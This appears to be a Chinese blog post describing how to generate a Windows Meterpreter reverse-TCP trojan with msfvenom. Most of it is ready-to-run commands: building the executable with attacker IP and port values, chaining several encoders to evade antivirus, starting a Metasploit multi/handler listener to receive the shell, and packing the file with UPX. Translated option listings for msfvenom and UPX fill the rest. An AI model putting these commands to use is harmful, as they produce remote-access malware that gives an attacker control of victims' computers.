zoukankan      html  css  js  c++  java
  • msfvenom木马生成+免杀+壳(实测并不能免杀)

    msfvenom 选项: -p, --payload 有效载荷使用。指定一个有效的自定义载荷 --payload-options 列出有效载荷的标准选项 -l, --list [type] 列出一个模块类型。选项有:有效载荷,编码器,NOP,所有 -n, --nopsled 在一个nopsled [长度]的大小对有效载荷 -f, --format 输出格式(使用-一个列表的帮助格式) --help-formats 列出可用的格式 -e, --encoder 使用的编码器 -a, --arch 使用的架构 --platform 有效载荷平台 --help-platforms list available平台 -s, --space 所得到的有效载荷的最大大小 --encoder-space 编码的有效载荷的最大大小(默认值为S的值) -b, --bad-chars 人物避免实例列表:“x00xff” -i, --iterations 编码有效负载的次数 -c, --add-code 指定一个额外的Win32文件包括shellcode -x, --template 指定要使用的自定义可执行文件作为模板 -k, --keep 保存模板行为,并将有效载荷注入一个新线程 -o, --out 保存有效载荷 -v, --var-name 为特定的输出格式指定一个自定义变量名称 --smallest 产生最小可能的有效载荷 -h, --help 显示此消息

    实例: (生成)

    msfvenom -p(有效攻击载体) windows/meterpreter/reverse_tcp -e(使用编码器,理解成在什么平台运行) x86/shikata_ga_nai -i (编码次数,理解成混淆特征码)5 -b(特征码绕过) “x00” lhost=192.168.11.227 lport=443(攻击者ip和监听端口) -f(输出的格式) exe > (输出成什么)payload.exe

    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b “x00” lhost=192.168.0.7 lport=4444 -f exe > text.exe

    Msf> use exploit/multi/handler #用于反向监听的模块
    Msf exploit(handler)>set payload windows/meterpreter/reverse_tcp #选择攻击模块
    Payload => windows/meterpreter/reverse_tcp
    Msf exploit(hanler) > show options
    Msf exploit(hanler) > set lhost 192.168.11.222
    Msf exploit(hanler) > set lport 443
    Msf exploit(hanler) > exploit #启用监听

    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b “x00” lhost=192.168.11.227 lport=443 -f raw (生成可编译机器码)|(管道符传递) msfvenom -a x86 --platform win -e x86/alpha_upper -i 2 -f raw | msfvenom -a x86 --platform win -e x86/shikata_ga_nai -i 5 -f raw |msfvenom -a x86 --platform win -e x86/countdown -i 5 -f exe -o text.exe (以上经过多次混淆代码 但文件依旧可以使用 )

    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b “x00” lhost=192.168.0.7 lport=4444 -f raw | msfvenom -a x86 --platform win -e x86/alpha_upper -i 2 -f raw | msfvenom -a x86 --platform win -e x86/shikata_ga_nai -i 5 -f raw |msfvenom -a x86 --platform win -e x86/countdown -i 5 -f exe -o text.exe

    加壳 压缩 (使其成为透明)
    Ultimate Packer for eXecutables
    Copyright (C) 1996 - 2013
    UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013

    Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..

    命令:
    -1 压缩更快 -9 压缩更好
    -d 使减压; -l 表压缩文件
    -t 测试压缩文件 -V 显示版本号
    -h 给更多的帮助 -L 显示软件许可证
    选项:
    -q 安静模式 -v 是冗长的
    -oFILE 写入输出到“文件”
    -f 可疑文件的强制压缩
    -k 保存备份文件
    file.. 可执行文件(DE)压缩

    类型“UPX --帮助更详细的帮助。
    UPX 配备 ABSOLUTELY NO WARRANTY; 详情访问http://upx.sf.net

    upx -5 text.exe

    文末附加 upx详细参数解析 (未翻)

    Ultimate Packer for eXecutables
    Copyright (C) 1996 - 2013
    UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013

    Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..

    命令:
    -1 压缩更快 -9 压缩更好
    -d 使减压; -l 表压缩文件
    -t 测试压缩文件 -V 显示版本号
    -h 给更多的帮助 -L 显示软件许可证
    选项:
    -q 安静模式 -v 是冗长的
    -oFILE 写入输出到“文件”
    -f 可疑文件的强制压缩
    -k 保存备份文件
    file.. 可执行文件(DE)压缩

    --no-color, --mono, --color, --no-progress 改变外观

    压缩优化选项:
    --brute 尝试所有可用的压缩方法和过滤器 [slow]
    --ultra-brute 尝试更多的压缩变种 [very slow]

    备份选项:
    -k, --backup 保持文件备份
    --no-backup 没有备份文件[默认]

    覆盖选项:
    --overlay=copy 复制附加到文件的任何额外数据[默认]
    --overlay=strip 带附加到文件的任何附加数据[DANGEROUS]
    --overlay=skip 不要用覆盖来压缩文件

    在 djgpp2/coff的选项:
    --coff 产生COFF输出[默认]:EXE

    可选择的:
    --8086 使压缩的任何8086个工作

    选择dos/exe:
    --8086 使压缩exe在任何8086
    --no-reloc 把没有搬迁到EXE头

    选择dos/sys:
    --8086 使压缩的系统工作在任何8086

    选择生成 ps1/exe:
    --8-bit 使用8位大小压缩[默认值:32位]
    --8mib-ram 8 MB内存限制[默认:2 MIB ]
    --boot-only 禁用客户端/主机传输兼容性
    --no-align 不要对齐到2048个字节[使:-控制台运行]

    选择生成watcom/le:
    --le 产生了输出[默认]:EXE

    选择生成 win32/pe, rtm32/pe & arm/pe:
    --compress-exports=0 不要压缩导出部分
    --compress-exports=1 压缩导出部分[默认]
    --compress-icons=0 不要压缩任何图标
    --compress-icons=1 压缩所有,但第一个图标
    --compress-icons=2 压缩所有,但第一个图标目录[默认]
    --compress-icons=3 压缩所有图标
    --compress-resources=0 不压缩任何资源
    --keep-resource=list 不压缩列表指定的资源
    --strip-relocs=0 不带迁移
    --strip-relocs=1 带搬迁[默认]

    选择生成 linux/elf:
    --preserve-build-id 复制gnu.note.build-id压缩输出。

    file.. 可执行文件(DE)压缩

    此版本支持: (以下不在一一叙述 )
    AMD64-darwin.macho Mach/AMD64
    ARMEL-darwin.macho Mach/ARMEL
    amd64-linux.elf linux/ElfAMD
    amd64-linux.kernel.vmlinux vmlinux/AMD64
    amd64-win64.pe win64/pe
    arm-linux.elf linux/armel
    arm-linux.kernel.vmlinux vmlinux/armel
    arm-wince.pe arm/pe
    armeb-linux.elf linux/armeb
    armeb-linux.kernel.vmlinux vmlinux/armeb
    armel-linux.kernel.vmlinuz vmlinuz/armel
    fat-darwin.macho Mach/fat
    i086-dos16.com dos/com
    i086-dos16.exe dos/exe
    i086-dos16.sys dos/sys
    i386-bsd.elf.execve BSD/386
    i386-darwin.macho Mach/i386
    i386-dos32.djgpp2.coff djgpp2/coff
    i386-dos32.tmt.adam tmt/adam
    i386-dos32.watcom.le watcom/le
    i386-freebsd.elf BSD/elf386
    i386-linux.elf linux/elf386
    i386-linux.elf.execve linux/386
    i386-linux.elf.shell linux/sh386
    i386-linux.kernel.bvmlinuz bvmlinuz/386
    i386-linux.kernel.vmlinux vmlinux/386
    i386-linux.kernel.vmlinuz vmlinuz/386
    i386-netbsd.elf netbsd/elf386
    i386-openbsd.elf opnbsd/elf386
    i386-win32.pe win32/pe
    m68k-atari.tos atari/tos
    mips-linux.elf linux/mipseb
    mipsel-linux.elf linux/mipsel
    mipsel.r3000-ps1 ps1/exe
    powerpc-darwin.macho Mach/ppc32
    powerpc-linux.elf linux/ElfPPC
    powerpc-linux.kernel.vmlinux vmlinux/ppc32

    ...............................................................认真写每篇博客,如同我对待生活............................................................
  • 相关阅读:
    Java的自动拆箱和装箱
    记录一次买阿里云服务器、建站的经验
    java中的位运算符
    java String拼接时候的一个小问题
    java获取各类容器和数组的长度
    java多线程:循环屏障
    Spring框架10:spring编程式事务控制
    Spring框架9:spring实现声明式事务控制
    Spring框架8:spring使用AOP实现事务控制
    C++ 中的bind
  • 原文地址:https://www.cnblogs.com/itholidaycn/p/6399453.html
Copyright © 2011-2022 走看看